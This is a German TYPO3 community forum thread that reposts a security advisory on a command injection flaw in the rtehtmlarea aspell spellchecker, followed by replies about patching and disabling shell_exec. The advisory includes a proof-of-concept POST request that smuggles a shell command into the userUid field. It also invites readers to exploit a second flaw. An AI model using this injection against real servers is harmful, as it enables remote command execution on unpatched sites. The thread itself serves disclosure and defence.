---
title: "Typo3 Command Execution Vulnerability / htmlarea mit aspell"
url: "https://www.typo3.net/d/55288-typo3-command-execution-vulnerability-htmlarea-mit-aspell"
source: "typo3.net"
tags: ["Backend","RTE & CKEditor","Frage"]
created: "2006-12-20"
last_reply: "2007-01-18"
replies: 11
solved: false
page: 1
pages: 1
lang: "de"
---

# Typo3 Command Execution Vulnerability / htmlarea mit aspell

Backend › RTE & CKEditor · 11 Antworten · gestartet 2006-12-20

## Eröffnungsbeitrag

**scuba303** · 2006-12-20 · [Beitrag #1](https://www.typo3.net/d/55288-typo3-command-execution-vulnerability-htmlarea-mit-aspell/1)

info kam grade von securiteam.org

Typo3 Command Execution Vulnerability
------------------------------------------------------------------------

SUMMARY

<<http://www.typo3.com>> TYPO3 is "a free Open Source content management system for enterprise purposes on the web and in intranets. It offers full flexibility and extendability while featuring an accomplished set of ready-made interfaces, functions and modules".

In version 4.0 and above, Typo3 includes a sysext named rtehtmlarea. The extension can optionally also be installed on Typo3 versions below 4.0.
The RTE HTML Editor allows spell checking, for which it uses the command line tool 'aspell'. When this program is called, unvalidated user input is used as argument to the system call. Login to the backend is /not/ required to exploit this vulnerability.

This allows an attacker to execute arbitrary commands on the target system.

DETAILS

Vulnerable Systems:
 * Typo3 versions 4.0.0 - 4.0.3
 * Typo3 versions 3.7 and 3.8 with rtehtmlarea extension
 * Typo3 version 4.1beta

Immune Systems:
 * Typo3 version 4.0.4

The affected script resides in
/typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-check-logic.php which calls the vulnerable script /typo3/sysext/rtehtmlarea/pi1/class.tx_rtehtmlarea_pi1.php. It requires a GET parameter id with the pageid of an existing page. When the POST parameter cmd is set to learn, the parameter userUid is not validated and can be used by an attacker to inject code.

Here is the vulnerable code (line 208-):
$AspellCommand = 'cat ' . $tmpFileName . ' | ' . $this->AspellDirectory  .
' -a --mode=none' . $this->personalDictsArg . ' --lang=' .
$this->dictionary . ' --encoding=' . $this->parserCharset . ' 2>&1'; print $AspellCommand . "\n"; print shell_exec($AspellCommand);

There seems to be a second command execution vulnerability in the same file in line 365. It is left as a task to the reader to exploit that flaw.

For typo3 versions < 4.0, the rtehtmlarea extension is probably located at /typo3/ext.

Proof of concept:
Here is a sample POST request that writes a file 'shell.txt' into /tmp:

POST /typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-
check-logic.php?id=1 HTTP/1.1
Host: www.typo3host.abc
User-Agent: none
Content-Type: application/x-www-form-urlencoded
Content-Length: 111

psell_mode=fast&to_p_dict=1&cmd=learn&userUid=test;
echo+'shell'+>+/tmp/shell.txt %23&enablePersonalDicts=true

ADDITIONAL INFORMATION

The information has been provided by  <mailto:research@sec-consult.com> SEC Consult Research.
The original article can be found at:
<<http://www.sec-consult.com/272.html>> <http://www.sec-consult.com/272.html>

## Antworten

### [#2](https://www.typo3.net/d/55288-typo3-command-execution-vulnerability-htmlarea-mit-aspell/2) · steffenk · 2006-12-20

genaueres zum Update findet ihr hier:
<http://typo3.org/news-single-view/?tx_newsimporter_pi1%5BshowItem%5D=0&cHash=e4a40a11a9#single>

übrigens - mittwald.de hat (vorbildlich!) den patch auf allen Accounts eingespielt, wir dürfen uns gemütlich zurücklehnen :)

### [#3](https://www.typo3.net/d/55288-typo3-command-execution-vulnerability-htmlarea-mit-aspell/3) · jenses · 2006-12-20

> **steffenk schrieb:**
>
> übrigens - mittwald.de hat (vorbildlich!) den patch auf allen Accounts eingespielt, wir dürfen uns gemütlich zurücklehnen :)

Davon würde ich DRINGENDST abraten  ;)
Kontrolliert umgehend eure Accounts,
bei mir war trotz anders lautender Email weiterhin eine alte anfällige Version (1.3.7) als Sysex installiert, von einem Patch war nix zu sehen.

### [#4](https://www.typo3.net/d/55288-typo3-command-execution-vulnerability-htmlarea-mit-aspell/4) · derhansen · 2006-12-20

Wenn ich mir den entsprechend verwundbaren Code so ansehe...

```php
$AspellCommand = 'cat ' . $tmpFileName . ' | ' . $this->AspellDirectory

. ' -a --mode=none' . $this->personalDictsArg . ' --lang=' .

$this->dictionary . ' --encoding=' . $this->parserCharset . ' 2>&1';

print $AspellCommand . "\n";

print shell_exec($AspellCommand);
```

... würde ich sagen, wenn **shell_exec()** in der php.ini deaktivert ist, dann kann man die Lücke auch nicht benutzen um Code auszuführen.

Sehe ich das richtig?

### [#5](https://www.typo3.net/d/55288-typo3-command-execution-vulnerability-htmlarea-mit-aspell/5) · jenses · 2006-12-21

Sieht so aus.
Und du kannst dann auch nicht mehr das Aspell-Feature nutzen ...

### [#6](https://www.typo3.net/d/55288-typo3-command-execution-vulnerability-htmlarea-mit-aspell/6) · javalexG · 2006-12-21

Hallo!

gibt es keine Probleme mit anderen Extensions, wenn ich shell_exec() ausschalte?

Gruß

### [#7](https://www.typo3.net/d/55288-typo3-command-execution-vulnerability-htmlarea-mit-aspell/7) · skywalk · 2006-12-27

Hallo!

Wie kann ich den von extern, also von zuhause testen ob meine Installation überhaupt anfällig ist? Ob nun ein Update eingespielt ist oder nicht, gerne würde ich wissen wie ich das teste - und anschließend handeln.

Gruß

### [#8](https://www.typo3.net/d/55288-typo3-command-execution-vulnerability-htmlarea-mit-aspell/8) · just2b · 2006-12-27

> **skywalk schrieb:**
>
> Wie kann ich den von extern, also von zuhause testen ob meine Installation überhaupt anfällig ist? Ob nun ein Update eingespielt ist oder nicht, gerne würde ich wissen wie ich das teste - und anschließend handeln.

hier wird sicher keine Anleitung gepostet wie man eine TYPO3-Installation hackt!

georg

### [#9](https://www.typo3.net/d/55288-typo3-command-execution-vulnerability-htmlarea-mit-aspell/9) · skywalk · 2006-12-27

> **just2b schrieb:**
>
> > **skywalk schrieb:**
> >
> > Wie kann ich den von extern, also von zuhause testen ob meine Installation überhaupt anfällig ist? Ob nun ein Update eingespielt ist oder nicht, gerne würde ich wissen wie ich das teste - und anschließend handeln.
>
> hier wird sicher keine Anleitung gepostet wie man eine TYPO3-Installation hackt!
>
> georg

Sorry, wenn ich hier einen falschen Eindruck hinterlassen habe. Ich wollte nur meine eigene Installation testen, mehr nicht. Ich werde dann wohl einfach die entsprechende Funktion abschalten, basta.

Danke!

### [#10](https://www.typo3.net/d/55288-typo3-command-execution-vulnerability-htmlarea-mit-aspell/10) · just2b · 2006-12-27

> **skywalk schrieb:**
>
> Sorry, wenn ich hier einen falschen Eindruck hinterlassen habe. Ich wollte nur meine eigene Installation testen, mehr nicht. Ich werde dann wohl einfach die entsprechende Funktion abschalten, basta.

ja wir kennen es nur alle... immer nur vom eigenen zip file das Passwort vergessen ;)

abschalten oder einfach updaten

lg georg

### [#11](https://www.typo3.net/d/55288-typo3-command-execution-vulnerability-htmlarea-mit-aspell/11) · pulponair · 2007-01-18

> **just2b schrieb:**
>
> hier wird sicher keine Anleitung gepostet wie man eine TYPO3-Installation hackt!

warum eigentlich nicht, das ding ist uralt und alle machen sich in die hosen, wegen sonner trivialen geschichte. Darf ich darf ich ?;)

### [#12](https://www.typo3.net/d/55288-typo3-command-execution-vulnerability-htmlarea-mit-aspell/12) · just2b · 2007-01-18

> **pulponair schrieb:**
>
> > **just2b schrieb:**
> >
> > hier wird sicher keine Anleitung gepostet wie man eine TYPO3-Installation hackt!
>
> warum eigentlich nicht, das ding ist uralt und alle machen sich in die hosen, wegen sonner trivialen geschichte. Darf ich darf ich ?;)

nö! es wird genug installationen geben, die nicht auf aktuellem stand sind ;) hack doch localhost ;)

georg

---

Quelle: „Typo3 Command Execution Vulnerability / htmlarea mit aspell“, typo3.net, https://www.typo3.net/d/55288-typo3-command-execution-vulnerability-htmlarea-mit-aspell
Beiträge von Mitgliedern des Forums. Bitte mit Link auf die Diskussion zitieren.
